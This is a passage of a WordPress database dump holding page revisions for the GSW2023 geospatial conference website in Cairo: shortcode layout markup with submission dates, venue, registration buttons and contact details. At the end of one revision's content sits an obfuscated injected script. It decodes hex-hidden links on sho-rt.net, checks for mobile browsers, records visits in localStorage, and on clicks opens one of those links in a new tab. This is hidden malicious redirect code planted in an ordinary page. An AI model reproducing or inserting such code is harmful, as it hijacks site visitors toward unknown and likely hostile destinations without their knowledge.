width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1673292178000{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-01-09 19:22:57','2023-01-09 19:22:57','',3066,'https://gsw2023.com/?p=3540',0,'revision','',0),
(3541,1,'2023-01-09 21:47:53','2023-01-09 21:47:53','<p>[vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1673292178000{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" 